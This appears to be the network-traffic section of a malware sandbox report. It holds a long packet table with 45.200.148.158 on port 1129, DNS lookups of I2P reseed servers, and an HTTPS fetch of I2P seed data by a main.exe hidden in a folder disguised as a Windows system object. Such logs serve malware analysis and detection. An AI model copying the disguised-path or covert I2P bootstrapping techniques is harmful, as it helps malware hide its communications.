Jan 1, 2025 18:10:02.839649916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839659929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839674950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.839677095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839689970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839704990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839713097 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.839718103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839724064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.840008974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.840018988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.840039015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.840046883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.840061903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.841140985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.841294050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841304064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841320992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841345072 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.841371059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841381073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841394901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841412067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.841440916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.841440916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.841583967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.845141888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.847892046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.847933054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.847943068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.847992897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848011017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848016024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.848035097 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.848104000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848114967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848131895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848182917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.848182917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.848754883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848793983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848808050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848923922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848932981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848952055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848962069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.848975897 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849133968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849145889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849147081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849164009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849176884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849186897 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849287987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849317074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849405050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849416018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849433899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849436045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849446058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849457026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849463940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849474907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849488020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849666119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849692106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849826097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849837065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849853992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849865913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849877119 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849883080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849893093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849895954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849909067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849920988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849922895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849941015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.849988937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.849988937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.850326061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850336075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850353956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850366116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850380898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850393057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850399017 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.850411892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850413084 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.850440025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.850584984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850595951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850614071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850626945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850641966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850666046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.850841999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850852966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850868940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850871086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.850879908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850898027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850959063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850971937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850986004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.850996017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851011038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851027012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851038933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851053953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851067066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851540089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.851577044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.864504099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864612103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864625931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864672899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864684105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864708900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.864798069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864809990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.864825010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.865143061 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.898874998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.898962021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.898978949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.899003029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.899017096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.899033070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.899041891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.899187088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.899198055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.899213076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.901141882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.901485920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.901536942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.901551008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.901674032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.901684046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.901701927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.901702881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.901732922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.901832104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.905138969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.925882101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.925988913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926002979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926124096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926132917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926148891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926160097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926263094 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.926263094 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.926263094 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.926374912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926386118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926403999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926415920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926431894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926445961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926459074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926467896 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.926476955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.926805973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926816940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.926990032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.927000999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.927012920 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.927018881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.927031994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.927041054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.927048922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.927052975 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.928029060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928056002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.928117990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928128958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928253889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928263903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928280115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.928349972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928360939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.928375959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.929143906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.934665918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934715986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934726000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934828997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934855938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.934890985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934900999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934920073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934928894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.934942961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.935467005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935489893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.935517073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935527086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935595989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.935595989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.935662985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935672998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935798883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935808897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935822964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.935909986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935920000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.935931921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936021090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936032057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936048031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936048031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936058998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936072111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936081886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936105013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936297894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936413050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936424017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936435938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936439037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936455011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936464071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936470985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936482906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936492920 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936496973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936515093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936525106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936902046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936912060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936928034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936930895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936944962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936954021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.936959982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.936985016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.937154055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937165976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937208891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937223911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937235117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937248945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.937629938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937639952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937655926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937655926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.937665939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937678099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.937684059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937699080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.937709093 CET	1129	49730	45.200.148.158	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 18:10:16.753196955 CET	192.168.2.4	1.1.1.1	0x15a6	Standard query (0)	reseed.i2pgit.org	A (IP address)	IN (0x0001)	false
Jan 1, 2025 18:11:28.619482994 CET	192.168.2.4	1.1.1.1	0xea12	Standard query (0)	reseed.diva.exchange	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 18:10:16.762455940 CET	1.1.1.1	192.168.2.4	0x15a6	No error (0)	reseed.i2pgit.org		68.183.196.133	A (IP address)	IN (0x0001)	false
Jan 1, 2025 18:11:28.667567968 CET	1.1.1.1	192.168.2.4	0xea12	No error (0)	reseed.diva.exchange		80.74.145.70	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	68.183.196.133	443	7100	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 17:10:17 UTC	103	OUT	GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2025-01-01 17:10:17 UTC	288	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 01 Jan 2025 17:10:17 GMT Content-Type: application/octet-stream Content-Length: 63161 Connection: close Content-Disposition: attachment; filename=i2pseeds.su3 X-Ratelimit-Limit: 4 X-Ratelimit-Remaining: 3 X-Ratelimit-Reset: 900
2025-01-01 17:10:17 UTC	3830	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 17 00 00 00 00 00 00 f4 6a 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 35 37 33 39 30 34 33 00 00 00 00 00 00 68 61 6e 6b 68 69 6c 6c 31 39 35 38 30 40 67 6d 61 69 6c 2e 63 6f 6d 50 4b 03 04 14 00 08 00 08 00 b7 5b 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 79 30 4a 35 4d 47 4f 78 4b 55 34 77 59 4b 6e 57 64 49 68 76 4c 48 32 52 69 5a 67 6c 49 78 63 6e 57 75 7a 61 52 30 6d 54 41 41 77 3d 2e 64 61 74 55 54 05 00 01 2a 27 75 67 ca b2 9e c9 1d e1 c4 f5 b8 e5 9a 52 77 b2 52 f2 fe e3 75 8a cc 81 87 e4 58 e4 be b0 d5 3c 91 b4 c9 f8 27 c0 b2 30 71 03 87 bc eb 3e cf f7 fc 2b d6 65 70 6f be 7f 71 59 be bc 49 59 84 69 f7 02 96 65 ff 6f 6c 53 2e fb ca e3 73 b7 5b ab Data Ascii: I2Psu3j1735739043hankhill19580@gmail.comPK[!Z;routerInfo-y0J5MGOxKU4wYKnWdIhvLH2RiZglIxcnWuzaR0mTAAw=.datUT*'ugRwRuX<'0q>+epoqYIYieolS.s[
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 03 04 14 00 08 00 08 00 79 6b 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 58 37 52 35 5a 6c 75 61 54 49 4a 4e 31 5a 43 30 70 49 68 4d 48 43 58 43 32 43 4b 62 46 4b 4f 41 41 4b 59 71 4e 72 38 57 71 71 41 3d 2e 64 61 74 55 54 05 00 01 d7 42 75 67 da f6 21 82 35 b2 65 9e c9 99 c4 95 62 91 5f f4 f2 9c 66 b0 df fe ec 6b 53 10 22 56 ae ad d8 f7 c6 c0 5a 44 69 be 51 d0 92 c7 b9 5f 8e 4d 5a ad 53 cb d7 fb 5d 75 da 23 ed 95 4a 21 3a 69 61 b2 71 fa 0c a3 f2 f8 e5 0d 0f 9f d4 8b 38 b1 e0 d9 61 f6 ba 22 21 46 16 f1 c6 e3 3f 9f ce 2e bf 3f ad f0 d3 e9 45 86 e6 2b cd 58 19 58 18 d8 19 58 18 18 18 a7 28 f1 4a 08 b0 30 33 40 01 ab 5f 88 73 80 11 43 39 4b 46 7e 71 89 2d 9f 85 85 9e a1 a5 b1 9e a1 89 99 9e a1 99 a9 35 63 a6 ad 44 Data Ascii: yk!Z;routerInfo-X7R5ZluaTIJN1ZC0pIhMHCXC2CKbFKOAAKYqNr8WqqA=.datUTBug!5eb_fkS"VZDiQ_MZS]u#J!:iaq8a"!F?.?E+XXX(J03@_sC9KF~q-5cD
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: f2 92 b8 3d f5 1d 07 7b fd c9 8b 97 19 27 49 1c 3d 24 bd 28 78 bd 1c c3 ff e5 4b 97 b4 7d 4b 49 a8 66 55 62 39 a2 3f e1 e1 bd cb 8c fd 42 2a 7d d9 cb 7e 3c b9 9e 1b 73 ce e2 d4 df a9 7b 6e 9e ee 4d fe f9 72 54 1e bf fc 49 f1 a9 9f 9d dd 4d 57 6d 99 18 cc 38 31 d1 e1 46 c4 af d3 0a 9f 58 3a d4 4c 4a ed 8c 45 b3 a3 98 58 19 58 18 d8 19 58 18 18 18 a7 28 c6 55 04 33 31 33 40 01 ab 5f 88 73 80 11 43 09 4b 46 7e 71 89 2d b7 a9 9e a1 85 a1 9e 91 9e a1 a1 81 35 63 a6 ad 84 51 99 b9 91 5b b6 45 6e 45 5a b1 81 59 aa 87 49 96 bf 7f 59 98 a3 ad ad 35 4b 41 7e 51 89 2d ab 91 91 a1 a9 a5 35 63 b1 ad 4e a5 73 a2 bf 45 61 78 66 9d a1 7b 6a 56 5a 6e a2 77 a0 8f a1 41 4e a8 97 b9 ae 91 67 50 64 96 87 99 53 86 67 78 78 72 99 a9 51 b1 ad 35 63 99 2d a3 91 35 07 cc 11 2c c1 Data Ascii: ={'I=$(xK}KIfUb9?B*}~<s{nMrTIMWm81FX:LJEXXX(U313@_sCKF~q-5cQ[EnEZYIY5KA~Q-5cNsEaxf{jVZnwANgPdSgxxrQ5c-5,
